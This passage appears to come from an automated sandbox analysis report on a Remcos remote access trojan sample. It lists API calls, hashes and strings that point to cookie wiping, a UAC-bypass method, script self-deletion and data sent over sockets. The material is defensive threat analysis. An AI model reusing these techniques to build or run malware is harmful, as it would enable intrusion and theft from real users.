                                                                                                • Opcode Fuzzy Hash: defca25013d2774486d33791db9c9e849cb2380b51e469b3df3a2ff11078fca2
                                                                                                • Instruction Fuzzy Hash: A4515871904209AFDB20AFB5D8C2F6E7BB8EF05310F14456EE52D97182EB358A41EB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 0041991A
                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 0041993B
                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 0041995B
                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 0041996F
                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419985
                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199A2
                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199BD
                                                                                                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 004199D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InputSend
                                                                                                • String ID:
                                                                                                • API String ID: 3431551938-0
                                                                                                • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                                                • Instruction ID: dbafcd600a556151d3eaef7b7a040db0989071afdf7399d2c68b8699c8e8566f
                                                                                                • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                                                • Instruction Fuzzy Hash: 4E319471554309AEE311CF51DD41BEBBBDCEF98B54F00080FF68086291D2A699C98B97
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 004490D2
                                                                                                • _free.LIBCMT ref: 004490F6
                                                                                                • _free.LIBCMT ref: 0044927D
                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 0044928F
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449307
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449334
                                                                                                • _free.LIBCMT ref: 00449449
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                • String ID:
                                                                                                • API String ID: 314583886-0
                                                                                                • Opcode ID: 47af7cbdf339c46287ceda7e7771956b815a7df14b66580b248b3cff71a48e97
                                                                                                • Instruction ID: 8213b5658e312fa0c8719fd21ead51c50bd85158425f8b852127bd6d3b2d9e40
                                                                                                • Opcode Fuzzy Hash: 47af7cbdf339c46287ceda7e7771956b815a7df14b66580b248b3cff71a48e97
                                                                                                • Instruction Fuzzy Hash: 6DC14971900205ABFB249F798D85AAFBBB8EF46314F1441AFE88497391E7388D41E75C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9
                                                                                                • _free.LIBCMT ref: 00444D46
                                                                                                • _free.LIBCMT ref: 00444D5D
                                                                                                • _free.LIBCMT ref: 00444D7C
                                                                                                • _free.LIBCMT ref: 00444D97
                                                                                                • _free.LIBCMT ref: 00444DAE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateHeap
                                                                                                • String ID: DD
                                                                                                • API String ID: 3033488037-393368396
                                                                                                • Opcode ID: 894deed27b140645b0a3b5a50c7487509b24122a7b298760850c43448a9a27f9
                                                                                                • Instruction ID: 794643540ba05b1832729bfd17deba34f9ae2695eded42236b1100d7bffd7706
                                                                                                • Opcode Fuzzy Hash: 894deed27b140645b0a3b5a50c7487509b24122a7b298760850c43448a9a27f9
                                                                                                • Instruction Fuzzy Hash: 1F51F571A00704AFEB20DF69C881B6A77F4EF89714F15456FE809D7251E739E901CB48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413A0A
                                                                                                • RegEnumKeyExW.ADVAPI32 ref: 00413A39
                                                                                                • RegEnumValueW.ADVAPI32 ref: 00413AD9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$InfoQueryValue
                                                                                                • String ID: [regsplt]$xUG$TG
                                                                                                • API String ID: 3554306468-1165877943
                                                                                                • Opcode ID: 64c4bec149cd04c75b22b0529d879bbeb51e457b34214b05c4e78b77d15b4099
                                                                                                • Instruction ID: e89ae2fc3e2f172f62eacf7d7454cf1e822e63a892199c4ebc4bb166adb4cb0d
                                                                                                • Opcode Fuzzy Hash: 64c4bec149cd04c75b22b0529d879bbeb51e457b34214b05c4e78b77d15b4099
                                                                                                • Instruction Fuzzy Hash: F4513C71900219AADB11EBA5DC85EEFB77DAF04309F10407BF505B2191EF786B48CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044B9F1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B2BE
                                                                                                • __fassign.LIBCMT ref: 0044B339
                                                                                                • __fassign.LIBCMT ref: 0044B354
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B37A
                                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044B9F1,00000000,?,?,?,?,?,?,?,?,?,0044B9F1,?), ref: 0044B399
                                                                                                • WriteFile.KERNEL32(?,?,00000001,0044B9F1,00000000,?,?,?,?,?,?,?,?,?,0044B9F1,?), ref: 0044B3D2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: 7f14d60be4bedc768f9c1ecc07add3f37f6dbe09138a2e94954e294804714371
                                                                                                • Instruction ID: 531f87820f5ca7332e2a576686b516ff1612a06bf14289906b3cf5c82a3cface
                                                                                                • Opcode Fuzzy Hash: 7f14d60be4bedc768f9c1ecc07add3f37f6dbe09138a2e94954e294804714371
                                                                                                • Instruction Fuzzy Hash: 43518170900249AFDB10CFA8DC85AEEBBF4EB09301F14456AE955E7392D734D941CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413C94
                                                                                                  • Part of subcall function 004139A3: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413A0A
                                                                                                  • Part of subcall function 004139A3: RegEnumKeyExW.ADVAPI32 ref: 00413A39
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413E02
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                                • String ID: xUG$NG$NG$TG
                                                                                                • API String ID: 3114080316-2811732169
                                                                                                • Opcode ID: 282d588d3909188580504e8da4b0556a988349574dae4fe2356a4b277d5de985
                                                                                                • Instruction ID: 7dadb05ed7d6a3791a19dcb9bd021d6cac3048b7f1650f13bd058f0b8db42a8b
                                                                                                • Opcode Fuzzy Hash: 282d588d3909188580504e8da4b0556a988349574dae4fe2356a4b277d5de985
                                                                                                • Instruction Fuzzy Hash: C5418D316082405BC324F726DC56AEF72959BD1348F40883FF54A671D2EF7C5D4A8AAE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00413569: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041358B
                                                                                                  • Part of subcall function 00413569: RegQueryValueExW.ADVAPI32(?,0040F261,00000000,00000000,?,00000400), ref: 004135AA
                                                                                                  • Part of subcall function 00413569: RegCloseKey.ADVAPI32(?), ref: 004135B3
                                                                                                  • Part of subcall function 0041BF05: GetCurrentProcess.KERNEL32(?,?,?,0040D9F8,WinDir,00000000,00000000), ref: 0041BF16
                                                                                                • _wcslen.LIBCMT ref: 0041B6B1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                • API String ID: 37874593-122982132
                                                                                                • Opcode ID: 02f4fff6ae0b27771b2aa90b56d6015931d8b5e32b8987f4592f74a2b3824b19
                                                                                                • Instruction ID: c6fac897f3708705da20762e946dcced6dc574eea8f21ad10bd7ff4b63ea14c8
                                                                                                • Opcode Fuzzy Hash: 02f4fff6ae0b27771b2aa90b56d6015931d8b5e32b8987f4592f74a2b3824b19
                                                                                                • Instruction Fuzzy Hash: 65219272A002082BDB04BAB59C96AFE766D9B49328F10043FF405B72D2FE7C9D48426D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004134F4: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413518
                                                                                                  • Part of subcall function 004134F4: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413535
                                                                                                  • Part of subcall function 004134F4: RegCloseKey.KERNEL32(?), ref: 00413540
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BEB9
                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BEC6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                • API String ID: 1133728706-4073444585
                                                                                                • Opcode ID: 35a2d3cb8f5d9bcb4f7ab1b2fd4fdddb9bec042da46c26696ec865b042f9e252
                                                                                                • Instruction ID: 801003b70fd9dbf496093a5a5275d638bd41a560824cd0b42c2c86a2de3f06d8
                                                                                                • Opcode Fuzzy Hash: 35a2d3cb8f5d9bcb4f7ab1b2fd4fdddb9bec042da46c26696ec865b042f9e252
                                                                                                • Instruction Fuzzy Hash: CA214D71A40219A6CB04F7A5CC569EE77699F10704F40017FE602B72D2EB786A498ADE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0721176012265fd08e84481192ff7188ea35d222f9f787e154cda1801c2bc97d
                                                                                                • Instruction ID: e67e80b8f015ee546dd56432ce4a8dadb94fcda799c7d0fc2e4964d2423921da
                                                                                                • Opcode Fuzzy Hash: 0721176012265fd08e84481192ff7188ea35d222f9f787e154cda1801c2bc97d
                                                                                                • Instruction Fuzzy Hash: C711E771504224BBDB206F768C04D6B7A6CEB85376B12452BFD11D7252DE39CC01C6B9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 0-537541572
                                                                                                • Opcode ID: e12b918d41bab609469a3115c0590793d90d94ea28ab80aeb452c0065a4a777a
                                                                                                • Instruction ID: 1f65caee0070b877db2fb54462239390b0138990937a6a58556f8fabfa8ffa9b
                                                                                                • Opcode Fuzzy Hash: e12b918d41bab609469a3115c0590793d90d94ea28ab80aeb452c0065a4a777a
                                                                                                • Instruction Fuzzy Hash: 8021D571A02220EBDB235B25CC48F6E7758DF457A0F250369ED22A72D0DA30EE0197E5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D347,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C37E
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C39B
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C3A7
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C3B8
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C3C5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                • String ID: hpF
                                                                                                • API String ID: 1852769593-151379673
                                                                                                • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                                                • Instruction ID: 157d56447e2bc733fdf4ad62f20ed10b0773735c38ec4f108ef208bf9d1535e6
                                                                                                • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                                                • Instruction Fuzzy Hash: 6E11E571284319FFE7144A249CC8EFB739CEB4A365F10862BF962C22D1C625CC81963D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00CCD338: _free.LIBCMT ref: 00CCD35D
                                                                                                • _free.LIBCMT ref: 00CCD3BE
                                                                                                  • Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CC7A83), ref: 00CC8967
                                                                                                  • Part of subcall function 00CC8951: GetLastError.KERNEL32(?,?,00CC7A83), ref: 00CC8979
                                                                                                • _free.LIBCMT ref: 00CCD3C9
                                                                                                • _free.LIBCMT ref: 00CCD3D4
                                                                                                • _free.LIBCMT ref: 00CCD428
                                                                                                • _free.LIBCMT ref: 00CCD433
                                                                                                • _free.LIBCMT ref: 00CCD43E
                                                                                                • _free.LIBCMT ref: 00CCD449
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 89e8bd580dadc0ca0831b6cc32d56457bf2851fca634395e219d98d1c19114df
                                                                                                • Instruction ID: cbde20585bd5b06534af7157450b9e4fdfbd109f8aa369ef0c9eb7937643c0f8
                                                                                                • Opcode Fuzzy Hash: 89e8bd580dadc0ca0831b6cc32d56457bf2851fca634395e219d98d1c19114df
                                                                                                • Instruction Fuzzy Hash: F1115171540B88AADA20B7B0CD47FDBB7BC9F00700F444D2DF69A6A0A2DA75F506A752
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00450B82: _free.LIBCMT ref: 00450BAB
                                                                                                • _free.LIBCMT ref: 00450E89
                                                                                                  • Part of subcall function 00446642: RtlFreeHeap.NTDLL(00000000,00000000,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?), ref: 00446658
                                                                                                  • Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A
                                                                                                • _free.LIBCMT ref: 00450E94
                                                                                                • _free.LIBCMT ref: 00450E9F
                                                                                                • _free.LIBCMT ref: 00450EF3
                                                                                                • _free.LIBCMT ref: 00450EFE
                                                                                                • _free.LIBCMT ref: 00450F09
                                                                                                • _free.LIBCMT ref: 00450F14
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: e6862f50bdfb19e703ceb93494df2a480b9e086095d1541665fc20bc27fa83d7
                                                                                                • Instruction ID: daec5615db7e7013758d3903cf5d85e3f15d59fd03a3aabe3c4119ba64e21dd5
                                                                                                • Opcode Fuzzy Hash: e6862f50bdfb19e703ceb93494df2a480b9e086095d1541665fc20bc27fa83d7
                                                                                                • Instruction Fuzzy Hash: CC11B131505B04AAE930BFB2CC47FCB779C5F01319F814C1EBA9A66063CA2CBA094759
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,0043A291,004391FE), ref: 0043A2A8
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A2B6
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A2CF
                                                                                                • SetLastError.KERNEL32(00000000,?,0043A291,004391FE), ref: 0043A321
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: 08359a294978b951ee6febe925dab381d1793c0aace0d6fcdcb34a4de7c4b766
                                                                                                • Instruction ID: 23de1630c3ab367d37157a08cb97d7a79375857f6765cbdf10d4ad4e4b451835
                                                                                                • Opcode Fuzzy Hash: 08359a294978b951ee6febe925dab381d1793c0aace0d6fcdcb34a4de7c4b766
                                                                                                • Instruction Fuzzy Hash: FB01243214C3516EE6142779AC86A6B2648EB1A3BDF20133FFA28416F1EF1D4C91924D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\yaALNupJCH.exe), ref: 004075D0
                                                                                                  • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                                                                  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                                • CoUninitialize.OLE32 ref: 00407629
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                                • String ID: C:\Users\user\Desktop\yaALNupJCH.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                • API String ID: 3851391207-4265757848
                                                                                                • Opcode ID: d5f38e2754d4a853ae590f96f95492258fb5b30eb1892ff619069dfefece9e33
                                                                                                • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                                                                • Opcode Fuzzy Hash: d5f38e2754d4a853ae590f96f95492258fb5b30eb1892ff619069dfefece9e33
                                                                                                • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BA2B
                                                                                                • GetLastError.KERNEL32 ref: 0040BA35
                                                                                                Strings
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B9F6
                                                                                                • UserProfile, xrefs: 0040B9FB
                                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040BA5B
                                                                                                • [Chrome Cookies not found], xrefs: 0040BA4F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                • API String ID: 2018770650-304995407
                                                                                                • Opcode ID: 88ba7c6cca983678e9453ff976780c883a64346e89eba16ec9507ec9410efbb7
                                                                                                • Instruction ID: f8558398cfa10caab86205241148ba1d2e69b793fc6e43cc3d80b603396840e2
                                                                                                • Opcode Fuzzy Hash: 88ba7c6cca983678e9453ff976780c883a64346e89eba16ec9507ec9410efbb7
                                                                                                • Instruction Fuzzy Hash: 5C01A271A402095ACA04BBB6DD5B8BE7728D911704F50017FF803725E2FE3E8A458ADE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • AllocConsole.KERNEL32(00475338), ref: 0041CCF2
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041CD0B
                                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CD30
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Console$AllocOutputShowWindow
                                                                                                • String ID: Remcos v$4.9.2 Pro$CONOUT$
                                                                                                • API String ID: 2425139147-375169418
                                                                                                • Opcode ID: 8df49d31de9d4cb6383eef02227129476ba2a6c9230629533c9b2db07849b5d1
                                                                                                • Instruction ID: a7c8f46aab14db75db5c93cd186e9c048c6b423ceef1700afcb39e88372a2f18
                                                                                                • Opcode Fuzzy Hash: 8df49d31de9d4cb6383eef02227129476ba2a6c9230629533c9b2db07849b5d1
                                                                                                • Instruction Fuzzy Hash: 9A0144B1E80304AAEB10FBF19D8BF9D376C9B14745F600427B608A70D3EB7D9954466E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(?,00CB48D0,00000000), ref: 00CCEB51
                                                                                                • __fassign.LIBCMT ref: 00CCED30
                                                                                                • __fassign.LIBCMT ref: 00CCED4D
                                                                                                • WriteFile.KERNEL32(?,00CB48D0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CCED95
                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CCEDD5
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CCEE81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 4031098158-0
                                                                                                • Opcode ID: ac2df0feb63bc4ea417fd33970f2b67c9a23f4787414d399e5317a2aced2874f
                                                                                                • Instruction ID: 185fd0f332119e06065a952d780315ddb6ac65f8e7eb9f168862a0c208440580
                                                                                                • Opcode Fuzzy Hash: ac2df0feb63bc4ea417fd33970f2b67c9a23f4787414d399e5317a2aced2874f
                                                                                                • Instruction Fuzzy Hash: 45D16971D002589FCB15CFA8C980EEDBBB5BF49314F28416EE856BB342D731AA46CB50
